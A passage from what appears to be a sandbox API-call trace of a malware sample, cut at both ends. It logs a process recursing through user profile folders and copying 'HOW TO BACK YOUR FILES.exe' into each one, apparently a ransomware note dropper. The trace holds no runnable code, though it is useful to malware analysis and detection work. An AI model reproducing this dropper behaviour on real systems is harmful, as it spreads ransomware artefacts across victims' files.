dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.866] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0078.866] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0078.866] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.866] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.867] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.867] GetLastError () returned 0x0 [0078.867] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.867] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.868] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0078.868] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0078.868] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.868] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.868] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.869] GetLastError () returned 0x0 [0078.869] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.869] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.869] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.869] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0078.869] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.869] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.870] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.870] GetLastError () returned 0x0 [0078.870] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.870] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.871] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.871] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0078.871] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.871] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.871] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.871] GetLastError () returned 0x0 [0078.872] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.872] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.872] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.872] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0078.872] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.872] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.873] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.873] GetLastError () returned 0x0 [0078.873] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.873] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.873] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.873] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0078.873] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.874] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.874] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.874] GetLastError () returned 0x0 [0078.874] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.874] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.875] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0078.875] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0078.875] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.875] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.875] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.876] GetLastError () returned 0x0 [0078.876] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.876] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.876] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0078.876] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0078.876] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.876] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.877] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.877] GetLastError () returned 0x0 [0078.877] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.877] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.878] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0078.878] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0078.878] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.878] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.878] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.879] GetLastError () returned 0x0 [0078.879] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.879] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0078.879] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0078.879] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0078.879] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.879] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.880] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.880] GetLastError () returned 0x0 [0078.880] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.880] FindFirstFileW (in: 